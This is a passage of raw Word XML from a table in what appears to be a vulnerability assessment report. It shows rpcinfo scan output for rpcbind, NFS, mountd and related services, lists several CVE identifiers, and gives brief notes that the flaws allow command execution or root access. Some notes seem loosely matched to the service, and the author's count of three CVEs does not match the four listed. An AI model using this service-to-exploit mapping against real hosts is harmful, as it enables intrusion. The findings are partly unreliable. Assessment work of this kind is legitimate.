          </w:p>
          <w:p w14:paraId="624315B2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100000  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            111/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42A43225" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100003  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,3,4       2049/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="30247F2C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100003  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,3,4       2049/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="032F8AA3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100005  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,2,3      33020/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="51E645E9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100005  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,2,3      51556/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mountd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0A14EC6B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100021  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,3,4      35344/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nlockmgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5FBE7725" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100021  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,3,4      57868/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nlockmgr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="28EDC213" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100024  1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          38392/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443B2181" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_  100024</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  1          58568/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>udp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B811A19" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12D2E875" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2 (RPC #100000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="402C8CE5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-1999-0190,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08261678" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2022-46478,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2017-7645,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2017-15014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3838B4F0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>So, I searched exactly version 2 and found the 3 of 636 provided CVE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72822FA1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows attackers to execute arbitrary commands via crafted Hessian serialized data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="076A2888" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0EA19265" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Solaris </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be exploited to overwrite arbitrary files and gain root access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="01A5E2C4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4BA7ABA0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A6FFFA0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AE898C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03DF9369" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
